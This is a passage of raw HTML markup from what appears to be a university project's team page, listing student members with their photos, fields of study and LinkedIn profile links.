class=\"\">Bhavya Busireddy</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c184\" class=\"h-text h-text-component style-915 style-local-182-c184 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c185\" class=\"style-923 style-local-182-c185 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bhavya-busireddy-b052b192/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c186-outer\">\n            <div data-colibri-id=\"182-c186\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c186 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c187\" class=\"d-block style-913 style-local-182-c187 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Vineeth-e1697208720256.jpg\" class=\"wp-image-1786 style-913-image style-local-182-c187-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c187-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c188\" class=\"h-global-transition-all h-heading style-914 style-local-182-c188 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c188\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Vineeth Kumar Chandha</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c189\" class=\"h-text h-text-component style-915 style-local-182-c189 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c190\" class=\"style-917 style-local-182-c190 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/vineeth-kumar-chandha-207611149/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c191-outer\">\n            <div data-colibri-id=\"182-c191\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c191 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c192\" class=\"d-block style-913 style-local-182-c192 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-sathwik-2-scaled-1-e1697208827396.jpg\" class=\"wp-image-1788 style-913-image style-local-182-c192-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c192-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c193\" class=\"h-global-transition-all h-heading style-914 style-local-182-c193 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c193\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sathwik Chowda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c194\" class=\"h-text h-text-component style-915 style-local-182-c194 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c195\" class=\"style-917 style-local-182-c195 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sathwikchowda/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c196-outer\">\n            <div data-colibri-id=\"182-c196\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c196 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c197\" class=\"d-block style-913 style-local-182-c197 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Brindal-e1697208968672.jpeg\" class=\"wp-image-1790 style-913-image style-local-182-c197-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c197-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c198\" class=\"h-global-transition-all h-heading style-914 style-local-182-c198 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c198\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Brindal Dhol</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c199\" class=\"h-text h-text-component style-915 style-local-182-c199 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c200\" class=\"style-917 style-local-182-c200 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/brindaldhol/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c201-outer\">\n            <div data-colibri-id=\"182-c201\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c201 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c202\" class=\"d-block style-913 style-local-182-c202 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-ruby_parcells-scaled-1-2-e1697209095569.jpg\" class=\"wp-image-1792 style-913-image style-local-182-c202-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c202-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c203\" class=\"h-global-transition-all h-heading style-914 style-local-182-c203 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c203\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ruby Parcells</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c204\" class=\"h-text h-text-component style-915 style-local-182-c204 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c205-outer\">\n            <div data-colibri-id=\"182-c205\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c205 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c206\" class=\"d-block style-913 style-local-182-c206 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Reshmanjali-1-e1697209179440.jpeg\" class=\"wp-image-1794 style-913-image style-local-182-c206-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c206-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c207\" class=\"h-global-transition-all h-heading style-914 style-local-182-c207 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c207\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sai Reshmanjali</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c208\" class=\"h-text h-text-component style-915 style-local-182-c208 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c209\" class=\"style-917 style-local-182-c209 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/reshmanjali-guntupalli/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c210-outer\">\n            <div data-colibri-id=\"182-c210\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c210 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c211\" class=\"d-block style-913 style-local-182-c211 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-cropped-Eliza-Schuh-e1697208271242.jpg\" class=\"wp-image-1795 style-913-image style-local-182-c211-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c211-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c212\" class=\"h-global-transition-all h-heading style-914 style-local-182-c212 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c212\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Eliza Schuh</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c213\" class=\"h-text h-text-component style-915 style-local-182-c213 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c214\" class=\"style-917 style-local-182-c214 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/search/results/all/?fetchDeterministicClustersOnly=true&amp;heroEntityKey=urn%3Ali%3Afsd_profile%3AACoAACVdt3kBua3o83BdyteC4Ssk8shnCAvZZZc&amp;keywords=eliza%20schuh&amp;origin=RICH_QUERY_TYPEAHEAD_HISTORY&amp;position=0&amp;searchId=e7657352-5ea3-4501-b984-d21542771bc4&amp;sid=WW)&amp;spellCorrectionEnabled=true\"\n                        h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c215-outer\">\n            <div data-colibri-id=\"182-c215\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c215 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c216\" class=\"d-block style-913 style-local-182-c216 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Bronson-e1697209357897.png\" class=\"wp-image-1797 style-913-image style-local-182-c216-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c216-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c217\" class=\"h-global-transition-all h-heading style-914 style-local-182-c217 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c217\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bronson Tharpe</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c218\" class=\"h-text h-text-component style-915 style-local-182-c218 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c219\" class=\"style-917 style-local-182-c219 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bronson-tharpe-9b754a1ba/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 